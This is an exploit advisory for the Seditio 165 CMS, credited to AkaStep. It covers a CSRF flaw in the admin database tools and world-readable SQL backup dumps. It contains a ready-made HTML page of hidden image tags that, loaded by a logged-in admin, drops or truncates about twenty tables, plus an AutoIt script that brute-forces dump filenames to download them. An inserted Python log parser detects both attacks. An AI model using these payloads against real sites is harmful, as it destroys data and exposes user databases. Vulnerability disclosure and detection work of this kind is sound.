Seditio 165 Cross Site Request Forgery / Backup Disclosure

Reported: 09 Apr 2012 by AkaStep
Type: packetstorm
Source: packetstormsecurity.com
Views: 23

Seditio 165 Cross Site Request Forgery / Backup Disclosure vulnerability in Kaan's version

Code
=============================================
Vulnerable Software: Seditio v165  
Downloaded from: http://seditio-eklenti.com/datas/users/1-seditio.165.rar   
(This version is under development of Kaan)  
  
$ md5sum 1-seditio.165.rar  
2eebc8d80f7fcd4e9a0d0659ef193488 *1-seditio.165.rar  
=============================================  
Vuln Desc:
Seditio 165 is prone to a cross-site request forgery vulnerability.
*Because the administration section uses T3 DB Tools v1.6 without any $_GET tokenization, CSRF against the application can be exploited without any problem and used to drop or truncate database tables.*
*The second issue is that Seditio 165 stores database dump files in an unsafe manner (see below).*
==============================================  
Tested:  
*php.ini MAGIC_QUOTES_GPC OFF*  
Safe mode off  
/*  
OS: Windows XP SP2 (32 bit)  
Apache: 2.2.21.0  
PHP Version: 5.2.17.17  
mysql> select version()  
-> ;  
+-----------+  
| version() |  
+-----------+  
| 5.5.21 |  
+-----------+  
*/  
=================================================  
  
  
Screenshot after a successful CSRF attack:
http://s019.radikal.ru/i601/1204/1b/90552af729ad.png  
  
  
====================== Seditio 165 Drop/truncate Database tables using CSRF vuln ===================================  
```html
<h1>Seditio 165 Drop Database tables using CSRF vuln<br>
Because usage of T3 DB Tools v1.6 without any $_GET tokenization in administration section.</h1>

<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_posts" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_sections" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_structure" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_topics" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165/t/admin.php?m=dbtools&a=drop&table=sed_logger" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pages" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pfs_folders" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pm" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls_options" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls_voters" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_redirecter" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_trash" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_referers" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_auth" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_banlist" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_com" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_plugins" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_users" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_online" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_config" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_core" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_groups_users" width="0" height="0"></img>
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_cache" width="0" height="0"></img>
<!--IDEA! CTRL+H http://192.168.0.15/learn/128/sed/seditio165/ to target :D-->
```
====================== EOF Seditio 165 Drop Database tables using CSRF vuln ===================================  
  
The &a=drop action can be changed to truncate as well, for example:
```html
<img src="http://CHANGE_TO_RTARGEt/admin.php?m=dbtools&a=truncate&table=sed_forum_posts" width="0" height="0"></img>
```
  
The other issue: there is no .htaccess file protecting the database dump files from the world (hint: an .htaccess containing `deny from all`).
  
```text
[email protected] /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups
# ls -lia
total 93
562949953537506 drwxrwxrwx+ 1 mehere ???????? 0 Apr 7 03:08 .
1407374883669468 drwxrwxrwx+ 1 mehere ???????? 0 Apr 7 03:02 ..
562949953537507 -rwxrwxrwx+ 1 mehere ???????? 370 Feb 12 21:39 index.php
1970324837100442 -rwx------+ 1 ???????? ???????? 91031 Apr 7 03:08 sed165_04.07.12-030823.sql <=== this is my dump

[email protected] /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups
# pwd
/cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups

[email protected] /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups
#
```
  
  
Since the database dump is potentially world-readable, it is possible to brute-force the name of any existing database dump(s) and steal them.
The proof of concept below is written from scratch and a bit lame, but it works for me at least:
Screenshot of the brute-force result:
http://s019.radikal.ru/i614/1204/af/a16616428e18.png  
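
Detection logic for both issues above (the GET-driven dbtools drop/truncate actions and the guessable dump names under datas/backups/), as an added example that is not part of the advisory: it parses Apache combined-format access log lines and flags destructive dbtools actions with their Referer, any .sql served from the backup directory, and repeated 404s for .sql names that match the brute-force pattern. The log lines, hostnames and the probe threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format log lines (sample input, not from the
# advisory): a CSRF-style dbtools burst plus an AutoIt-style dump-name probe.
SAMPLE_LOG = """\
10.0.0.7 - - [07/Apr/2012:03:10:01 +0400] "GET /seditio165/admin.php?m=dbtools&a=drop&table=sed_users HTTP/1.1" 200 512 "http://evil.example/page.html" "Mozilla/5.0"
10.0.0.7 - - [07/Apr/2012:03:10:01 +0400] "GET /seditio165/admin.php?m=dbtools&a=truncate&table=sed_forum_posts HTTP/1.1" 200 512 "http://evil.example/page.html" "Mozilla/5.0"
10.0.0.7 - - [07/Apr/2012:03:10:02 +0400] "GET /seditio165/admin.php?m=dbtools&a=list HTTP/1.1" 200 2048 "http://cms.example/admin.php" "Mozilla/5.0"
10.0.0.9 - - [07/Apr/2012:03:12:00 +0400] "GET /seditio165/datas/backups/sed165_04.07.12-030821.sql HTTP/1.1" 404 210 "-" "AutoIt"
10.0.0.9 - - [07/Apr/2012:03:12:00 +0400] "GET /seditio165/datas/backups/sed165_04.07.12-030822.sql HTTP/1.1" 404 210 "-" "AutoIt"
10.0.0.9 - - [07/Apr/2012:03:12:01 +0400] "GET /seditio165/datas/backups/sed165_04.07.12-030823.sql HTTP/1.1" 200 91031 "-" "AutoIt"
10.0.0.3 - - [07/Apr/2012:03:15:00 +0400] "GET /seditio165/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
DESTRUCTIVE = {"drop", "truncate"}
PROBE_THRESHOLD = 2  # 404s per IP before calling it enumeration; tune per site

def analyze(log_text):
    """Return (ip, message) findings for the two issues in the advisory."""
    findings = []
    misses = Counter()  # per-IP 404s for .sql names under datas/backups/
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, status = m["ip"], int(m["status"])
        url = urlparse(m["target"])
        qs = parse_qs(url.query)
        action = qs.get("a", [""])[0]
        # Issue 1: a table-destroying dbtools action reached by plain GET; an
        # off-site or missing Referer is what the hidden <img> PoC produces.
        if url.path.endswith("/admin.php") and qs.get("m") == ["dbtools"] and action in DESTRUCTIVE:
            findings.append((ip, f"dbtools {action} via {m['method']}, referer={m['referer'] or '-'}"))
        # Issue 2: .sql dumps under datas/backups/ being served (200) or guessed (404).
        if "/datas/backups/" in url.path and url.path.endswith(".sql"):
            if status == 200:
                findings.append((ip, f"backup dump served: {url.path}"))
            elif status == 404:
                misses[ip] += 1
    for ip, n in misses.items():
        if n >= PROBE_THRESHOLD:
            findings.append((ip, f"{n} misses for .sql names under datas/backups/ (filename enumeration)"))
    return findings
```

Feed a real access log to `analyze()` to get the same four kinds of findings; the served-dump finding is the one that confirms a disclosure rather than an attempt.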
  
  
==================== Bruteforcer to find existing database dump file for seditio 165 ==========================  
```autoit
#include <inet.au3>


$prefix='sed165_'; db prefix in most cases sed_

$il='2012'; start year
$ay='04' ; start month
$gun='07'; start day
$site='http://192.168.0.15/learn/128/sed/seditio165/datas/backups/'; target site


#cs
DO not touch
#ce


$saniye=00;
$deqiqe=00;
$saat=03;
;~ $gun='01'

$il=StringMid($il,3,StringLen($il))

while 1

Sleep(10);
$saniye+=1;
if $saniye >59 Then
$saniye='00'
$deqiqe+=1;
EndIf

if $deqiqe <10 Then
$deqiqe='0' & StringMid($deqiqe,StringLen($deqiqe),1)
EndIf

if $deqiqe >59 Then
$deqiqe='00';
$saat+=1;
EndIf

if $saat <10 Then
$saat='0' & StringMid($saat,StringLen($saat),1)
EndIf

if $saat >23 Then
$saat='00'
$gun+=1;
EndIf

if $gun <10 Then
$gun='0' & StringMid($gun,StringLen($gun),1)
EndIf

if $gun >31 Then
$gun='01';
$ay+=1;
EndIf

if $ay <10 Then
$ay='0' & StringMid($ay,StringLen($ay),1)
EndIf

if $ay >12 Then
$ay='01';
$il+=1;
EndIf


if $saniye <10 Then
$saniye='0' & StringMid($saniye,1,1);
EndIf

;~ format of dumpfile sed165_04.07.12-030823.sql
$fetchitifexists=$prefix & $ay & '.' & $gun & '.' & $il & '-' & $saat & $deqiqe & $saniye &'.sql' & @CRLF
ConsoleWrite('Verifying ' & $fetchitifexists & @CRLF);

if StringInStr(_INetGetSource($site & $fetchitifexists,TRUE),'-- T3 DB Tools',0) Then
MsgBox(0,"Check it out",$site & $fetchitifexists,10)

FileWrite(@ScriptDir &"\wohoooo.txt",$site & $fetchitifexists & @CRLF)
$confirm=MsgBox(65,"Exit or continue?","Exit or Continue?")
if $confirm=1 Then
MsgBox(48,"Bye","Byeeee xD");
Exit
EndIf
EndIf


WEnd
```
  
  
========================== EOF bruteforcer ============================================================  
  
  
  
  
/AkaStep ^_^  
